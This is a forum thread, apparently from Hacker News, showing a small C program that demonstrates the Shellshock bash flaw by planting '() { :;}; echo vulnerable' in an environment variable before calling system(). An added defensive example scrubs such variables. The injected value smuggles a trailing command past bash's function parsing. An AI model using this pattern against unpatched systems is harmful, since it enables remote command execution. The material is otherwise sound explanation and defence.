by chappar 4281 days ago
Here is a simple C program to demonstrate this.

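    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        /* Value looks like an exported bash function with a trailing command. */
        setenv("VAR", "() { :;}; echo vulnerable", 0);
        /* system() starts a shell, which inherits VAR from this process. */
        system("ls");
        return 0;
    }

    #./a.out
    vulnerable
    a.out
    #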

1 comments

That's awesome.

Does system() invoke /bin/sh? Does it look for 'sh' on the path? What are the rules?
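An added example, not part of the thread: a defensive counterpart to the program in the post, which removes every environment variable whose value begins with `() {` (the prefix unpatched bash parsed as an exported function definition) before a shell is started. The helper names are hypothetical and the sample variable is the one from the post.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* setenv, unsetenv, strndup */
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

/* 1 if the value starts with "() {", the prefix unpatched bash parsed as an
   exported function definition (and kept executing past the closing brace). */
int looks_like_bash_function(const char *value)
{
    return value != NULL && strncmp(value, "() {", 4) == 0;
}

/* Hypothetical helper: unset every variable with such a value.
   Returns the number removed, or -1 on allocation failure. */
int scrub_function_like_env(void)
{
    int removed = 0;
    for (char **e = environ; e != NULL && *e != NULL; ) {
        const char *eq = strchr(*e, '=');
        if (eq == NULL || eq == *e || !looks_like_bash_function(eq + 1)) {
            e++;
            continue;
        }
        char *name = strndup(*e, (size_t)(eq - *e));
        if (name == NULL)
            return -1;
        unsetenv(name);      /* may shift or reallocate environ ... */
        free(name);
        removed++;
        e = environ;         /* ... so rescan from the start */
    }
    return removed;
}

int main(void)
{
    /* Same variable as the program in the post (constructed input). */
    setenv("VAR", "() { :;}; echo vulnerable", 1);
    printf("removed %d variable(s)\n", scrub_function_like_env());
    return system("ls") == 0 ? 0 : 1;
}
```

The scrub also drops functions legitimately exported by a patched bash, and it is a stopgap for callers that cannot control which shell runs; updating bash is the actual fix.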